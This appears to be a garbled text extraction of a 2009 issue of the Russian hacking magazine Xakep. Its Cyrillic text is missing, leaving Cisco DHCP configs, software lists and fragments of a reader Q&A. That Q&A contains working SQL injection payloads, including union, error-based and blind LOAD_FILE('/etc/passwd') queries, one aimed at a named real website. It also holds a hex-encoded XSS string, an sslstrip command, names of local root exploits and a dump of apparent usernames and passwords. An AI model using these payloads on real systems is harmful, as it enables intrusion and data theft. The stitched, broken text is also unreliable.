Service Provider Services IPv6, Netflow, SSH,
BGP, ATM VoATM.
Enterprise Base IPX
AppleTalk. IBM features DLSw+, STUN/
BSTUN RSRB.
DHCP ,
, . ,
, ,
network.
DNS , , WINS
..:
!
cisco(config)#ip dhcp pool FirstPool
!
cisco(dhcp-config)#network 192.168.1.0 255.255.255.0
!
cisco(dhcp-config)#default-router 192.168.1.254
cisco(dhcp-config)#dns-server 192.168.1.254
cisco(dhcp-config)#domain-name domain1
cisco(dhcp-config)#exit
!
cisco(config)#ip dhcp pool SecondPool
!
cisco(dhcp-config)#network 192.168.3.0 255.255.255.0
!
cisco(dhcp-config)#domain-name domain2
cisco(dhcp-config)#default-router 192.168.3.2
cisco(dhcp-config)#dns-server 192.168.3.2
cisco(dhcp-config)#exit
! , DHCP
cisco(config)#ip dhcp excluded-address 192.168.1.200
192.168.1.254
cisco(config)#ip dhcp excluded-address 192.168.3.1
192.168.3.10
, DHCP ,
. ,
.
! , , , ,
, . . z
X 05 /125/ 09
>> units
CORWIN
/ CORWIN88@MAIL.RU, HTTP://
SECADVIS.WORDPRESS.COM /
FAQ UNITED:
Q: root- *nix-,
. , -
?
A: , , ,
,
,

kernel panic ( ,
).

, .
,
http://jshooter.by.ru/
xpl. , brk, h00lyshit, ptrace, mremap, raptor
. ,

:).

. iso CD
floppy,
. :
Windows Linux.
Q: Security- php-,

?
A: acid root
'UNION'?
A: ,
.
(cms), ,
.

*.sql(install.sql,
{cmsname}.sql ..). ,
:
, , :
/fopen$space$(.*)$userdat(.*)$/i
/mail$space$(.*)$userdat(.*)$/i
/\<\?\=$space(.*)$userdat/i
.
Q: sql-. .
Q: , -
sql-injection, ,
union select, Not
Acceptable.
A: , -
A: , .
Dariks Boot and Nuke
- UnIoN SeLEct .
140
Q: , Illegal mix of collations for operation
Table structure for table 'users'

CREATE TABLE IF NOT EXISTS 'users' (
'uid' int(8) NOT NULL
AUTO_INCREMENT,
'pass' varchar(30) COLLATE
latin1_general_ci DEFAULT NULL,
...
) ENGINE=MyISAM DEFAULT
CHARSET=latin1 COLLATE=latin1_
general_ci AUTO_INCREMENT=10 ;
latin1, :
host/script.php?id=10 union select 1,2,
convert(pass using latin1) from users
X 05 /125/ 09
>> units
Q: MS SQL
http://host/script.cfm?Author_ID=9
or 1=(SELECT TOP 1 TABLE_NAME FROM
NFORMATION_SCHEMA.TABLES WHERE TABLE_
, ASCII- ..
MS Access
http://www.techonthenet.com/access/
functions/index_alpha.php.
NAME NOT IN (logins))--,

Q: , SiXSS
. ?
A: .
Warning: mysql_fetch_array(): supplied
(
char(ASCII-_))
MS Sql +. ch
ar(108)+char(111)+char(103)+char(105)+char(11
0)+char(115). ,
,
+ -
. Url Encoding/Decoding
%2B. , :
argument is not a valid MySQL result resource....

A: 16- .
Q: ,
, <script>alert()</script> hex
: 0x3C7363726970743E616C65
727428293C2F7363726970743E,
-1 union select 1,2,0x3C736372
6970743E616C65727428293C2F73637269
70743E.
Q: SQL-injection more1row?
A: ( z # 111)
http://localcareers.com/seekers/
articles/profile.cfm?Author_ID=9
or 1=(SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME NOT IN (char(108)%2Bchar
(111)%2Bchar(103)%2Bchar(105)%2Bch
ar(110)%2Bchar(115)))--

Q: blind sql-
MS Access?
blind
sql-injection benchmark.
, .
, benchmarka
.
(
!), ,
benchmark

-.
. ,
:
A: MySQL
, .
, , ,
, :
http://host/script.asp?ID=1'
ASCII- ,
:
http://host/script.asp?ID=1 and
1=IIF(asc(mid((select last(UserID)
from users),1,1))=104,1,0)
script.php?vul=' and 1=(SELECT 1

UNION SELECT 2)
, mysql_
query():Subquery returns more than 1
row, .
, , blind
sql-injection,
IF()
(SELECT 1 UNION SELECT 2).
Q: .
, IIF
1 1 and 1=1
. , ,
, .
X 05 /125/ 09
. php.
ini:
magic_quotes=OFF # GPC-
;
error_reporting=E_ALL # ;
mysql.trace_mode=ON #
.
sql-, , ,
100%!
A: , PHP
A: /etc/passwd, :
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
'r', ascii- 114, :
http://host/script.php?vul=1' and
ascii(substring((LOAD_FILE('/etc/
passwd')),1,1))=111 ;
passwd')),1,1))=114
;
passwd')),1,1)) between 110 and 115
.
ASCII 10. 13.

HEXe.
length:
substring(length(LOAD_FILE('/etc/
passwd')),1,1)='4
substring(length(LOAD_FILE('/etc/
passwd')),2,1)='8
...
, .
,
, , , .
into_outfile,
( , ,
+
).
, load_file
http://milw0rm.com/exploits/5639. ASCII
141
>> units
: http://goascii.com.
: <img src='<%=Request.
QueryString(Param) %>'>.
A: :
Q: , PROCEDURE
ANALYSE() .
Q: .
Opera Mini ,
A: , -
,
,
,
.
,
.
MySQL , :
) . Google, ,

. Gmail, ,
. ?
Opera? Windows Mobile.
A: ,
Warning: mysql_result() [function.

mysql-result]: NAME not found in
MySQL result index 19 in /var/www/
virtual/host.com/htdocs/news/news.
php on line 19
Warning: mysql_result() [function.
mysql-result]: LOGIN not found in
MySQL result index 19 in /var/www/
virtual/host.com/htdocs/news/news.
php on line 21
.
http://host/script.
php?vul=1 union select 1,2,3. http://host/script.php?vul=1
PROCEDURE ANALYSE() -> jonas_
chalk.article.title.
jonas_chalk , article
, , title .
limit
http://host/script.php?vul=1
limit 1,1 PROCEDURE ANALYSE()->
jonas_chalk.article.question.
limit,
.
,
, .
pragmatk.
geeksgonewild.info/2009/01/to-the-limit-andbeyond.html.
Q: ASP XSS?
A: PHP
, print/echo,
ASP
Response, <%=,
Request.
142
Q: ,
WiFi-?
Opera. ,
Opera Mini? ,
jar-,
.cab. .
.jar- WM
, , Java
.
,
.cab-,
Java. ,
,
Java-
WM-.
? ,
Opera Mini
,
- (
) .
,
.
,
, Opera Mini
.
.
Q: ,
1. ,

,
MAC.
2. AP
DHCP-, IP- .
(Angry IP
Scanner, www.angryziber.com )
, .
3. kismet (www.
kismetwireless.net)
.
Q: :

-. , Google.
(
)?
A: -
AutoHotkey (www.
autohotkey.com/download) .
*.ahk,
:
#InstallKeybdHook
#Persistent
#HotkeyInterval,100
SetKeyDelay, -1
^+c::
{
Send, ^c
Sleep 50
Run, http://www.google.com/
search?q=%clipboard%
Return
}
. ?
A: ,
, -,
. : ,
,
.
, , ?
-,
.

.
: %clipboard%, , Google
URL .
, ( ,
#NoTrayIcon
). , <Ctrl+Shift+C> ,

Google . z
X 05 /125/ 09
>Multimedia
1by1 1.67
ImgBurn 2.4.4.0
Inkscape 0.46
mp3DirectCut 2.11
novaPDF 6.3
TuxGuitar 1.1
WinDjView 1.0.1
>Misc
Aml Maple 2.21
Cleeki 0.6
DAMN NFO Viewer 2.10.0032.RC3
Desktops 1.0
Directory Changes Watcher 1.3.2
Evernote 3.1.0
Interpretatio 1.4
ManicTime 1.1.1
Typle 2.0
Vista Drive Icon 1.4
>Games
Mario Forever 4.1
>Development
BlueJ 2.5.1
DiffMerge 3.3
GoogleAppEngine 1.2.1
JavaFX 1.1.1 SDK
JDK 6u13
Komodo IDE 5.1.3
NaviCoder IDE for Java 2.0
NetBeans IDE 6.7 Beta
PortablePython 1.1 (Py2.6)
PortablePython 1.1 (Py3.0.1)
Reflexil 0.9
RegexBuddy 3.3.0
RubyMine 1.0
SeleniumHQ 1.0 beta2
SharpDevelop 3.0
The Regulator 2.0
UltraGram 4.2.50
ZendFramework 1.8.0
>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns 9.41
DAEMON Tools Lite 4.30.3
Download Master 5.5.11.1167
FarPowerPack 1.15
FileZilla 3.2.4.1
K-Lite Mega Codec Pack 4.80
Miranda IM 0.7.19
Mozilla Firefox 3.0.10
Notepad++ 5.3.1
Opera 9.64
PuTTY 0.60
QIP Infium RC4 Build 9030
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96
>>UNIX
>Desktop
AbiWord 2.6.8
Adobe Reader 9.1
Antico 0.2
Blender 2.48a
Blueman 1.10
etexteditor 1.0.32
Floola 5.0
Foxit Reader 1.0
FreeArc 0.51
GoldenDict 0.8
K3b 1.65.0 alpha1
Launchy 2.1.2
Lotus Symphony 1.2
NVIDIA Gelato 2.2
Platinum Arts Sandbox 2.3
Qucs 0.0.15
Scilab 5.1.1
SimpleDict 0.3.0
VLC 0.9.9a
>System
Baku 3.7
Comodo Firewall + AntiVirus for
Windows 3.8
Core Temp 0.99.4
DiskDigger 0.8.1
FireDaemon Pro 1.9
JkDefrag 3.36
muCommander 0.8.3
Process Lasso v3.59.5 beta
Sandboxie 3.36
SIW 2009-03-17
VirtualBox 2.2.2
WinPatrol 16
>Security
0x4553-Intercepter 0.7.8
BlueScanner 1.1.2
Cain&Abel 2.0
ettercap-NG 0.7.3
Fiddler2
hping 2.0.0
Nemesis 1.4
Netcat 1.10
NetworkMiner 0.87
New Folder
ngrep 1.45
packETH 1.6
Scapy last release
Socat 2.0.0
tcpindex 1.0
WinDump 3.9.5
WinPcap 4.0.2
Wireshark 1.0.7
>Net
Cleeki 0.6.1185
Http File Server 2.2f
PrinterShare 1.2.1
TeamViewer 4.1.6
The Dude 3.3
XBMC Media Center BabylonRC1
>Security
CeWL 2.1
Charles 3.3.1
Complemento 0.7
dnsmap 0.22
I2P 0.7.2
Lynis 1.2.6
Medusa 1.5
ProxyStrike 2.1
screenstamp 1.0
SD4L 2.0
Snort 2.8.4.1
sqlsus 0.3
Tor 0.2.0.34
Ucsniff 2.1
WarVOX 1.0.0
Webshag 1.10
>Net
Adobe Flash Player 10.0.22
FileZilla Client 3.2.4.1
FireFox 3.0.10
FreePOPs 0.2.9
Hamachi 0.9.9.9-20
Instantbird 0.1.3.1
Jungle Disk 2.60c
Mumble 1.1.8
Opera 9.64
p300
Pidgin 2.5.5
Quamachi 0.4.1
RSSOwl 2.0 M9
SeaMonkey 1.1.16
SquirrelMail 1.4.17
SSL-Explorer 1.0
Vuze 4.2.0.2
xMule 1.13.7
>Games
Arasan 11.3
>Devel
Amaya 11.1
Android SDK 1.5
Aqua Data Studio 7.5.0
BlueJ 2.5.1
DiffMerge 3.3
Eclipse 3.4.2
ECMerge 2.2
Free Pascal 2.2.4
gcc 4.4.0
Gmp 4.3.0
Komodo Edit 5.1.1
Mono 2.4
MonoDevelop 2.0
NetBeans IDE 6.7 Beta
Qt Creator 1.1
Razorsql 4.5.6
Reverse Snowflake Joins 0.25
WinDriver10.0.1
XAMPP 1.7.1
Workrave 1.9.0
Xarchiver 0.5.2
XNeur 0.9.4
>System
ATI 9.4
Conky 1.6.1
Coreutils 7.3
Dropbox 0.6.507
Intel Thread Checker 3.1
Linux Kernel 2.6.29.2
nVidia 180.51
PacketFence 1.8.2
Q4Wine 0.111
Sudo 1.7.1
TestDisk 6.11
VirtualBox 2.2.2
Webmin 1.470
Wine 1.1.20
>Server
Abyss Web Server X1 2.5
Apache 2.2.11
BIND 9.6.1b1
DHCP 4.1.1b1
Honeyd 1.5c
Jabberd 2.2.8
Kerio MailServer 6.6.1
MySQL 6.0.10 Alpha
OpenLDAP 2.4.16
OpenSSH 5.2
Postfix 2.6
PostgreSQL 8.4 Beta
PulseAudio 0.9.15
Pure-FTPd 1.0.22
Samba 3.3.4
Sendmail 8.14.3
SQUID 3.0 STABLE14
Webtunnel 0.0.5
05(125) 2009
. 36
. 120
12
WINDOWS 7

144
05 (125) 2009
. 50
. 84
OPENBSD
4.5 NETBSD 5.0
BSD
w w w.xakep.ru
: 6
http://
WWW2
2

P2P-
WINDOWS, MAC LINUX

WUALA
WWW.WUALA.COM
,
Dropbox. , Wuala
, , 2 .
,
p2p-, Wuala. ,
, !
BACKUPURL
WWW.BACKUPURL.COM
, ,
. ,
, !
i, . ,
backupURL,
(html, css- ), ( ) .
SMS
WHITE IDE
LNK.UZ/D0A238
- JS-. White IDE ,

,
Prototype.js, jQuery, MooTools ExtJS. ,
, JavaScript/CSS
.
144
SITE24X7
SITE24X7.COM
, - . Site24x7,

SMS. ,
:).
X 05 /125/ 09

Хакер 2009 05 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 05 PDF

Загружено:

Авторское право:

Доступные форматы

: 6

OpenBSD 4.5 NetBSD 5.0

/ .: (495) 935-7034, : (495) 780-8824

MIFRILL / MIFRILL@R EAL.XAKEP.RU /

. Oracle , , Java Sun

Lavalys Everest Ultimate Edition

Hitachi DeskStar HD721010KLA330

, : 2200, AMD Athlon 64 3500+ (Socket 939)

Hitachi DeskStar HD721010KLA330

Hitachi DeskStar HD721010KLA330

Western Digital WD1001FALS

Western Digital WD1001FALS

WD1001FALS Caviar Black

Western Digital WD10EADS

XMPP, REST, JSON.

BASIC CONSTRAINTS CA=FALSE

<yourListenPort> , sslstrip; 8080, .

#bt sslstrip -a -l 8080 -w /root/log.txt

Moxie Marlinspike sslstrip tor 24

SUN TECH DAYS 2009

UBUNTU SEAMLESS WINDOWS RPD, DEBIAN LENNY

net use x: \\vboxsvr\sharename, x:

? , : VBoxManage.exe startvm w7.

CAIN AND ABEL

HTTP, SMTP, FTP ..

5. : Free PHP Encoder www.www.freephpencoder.

msf > db_create[*] The specified database

Oracle, Apache WEB-

: zipcode, users, uploads_navfile, uploads,

: sort_order, logon_url, id, active,

: username, password, id, full_name,

johnny k8vt9~;3 Johnny Withers 0 0

enrollment mvzwttumv|6 Online

Pros & Cons

ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8]

, , LFI , , httpd.conf / php.ini.

Tamper Data, . : Mozilla

, EAServer 5.5 Release. ,

, Authorization bypass jagadmin

function checkVkey($imei, $vkey)

catch( Exception $exception )

echo '<tr bgcolor="'.($pageVie

$sqlGetView = "SELECT * FROM zombies";

echo '<table border="1" width="100%"

FIREFOX TEMPER DATA

FIREBUG VS. OFFLINE EXPLORER

FIREFOX FIREBUG CONSOLE!

FIREFOX FIREBUG CONSOLE!

/ ICQ 884888, HTTP://WAP-CHAT.RU /

1.5.x 207 (0.6%)

4. Action edit_post ./wp-includes/

Snoopy WordPress <= 2.6.2:

Snoopy WordPress <= 2.6.5:

$name = sanitize_file_name( $data['name'] );

: Manage => Uploads.

// Let's check the remote site

: WEB SECURITY SYSTEM

: UNIQUE PACK V.1.1

Linux -, IBM PC. ,

ROM SAM Boot

Dataflash 0x8400. Environment, , , , - .

OpenBSD 4.5 NetBSD 5.0

UNIX- Linux FreeBSD ,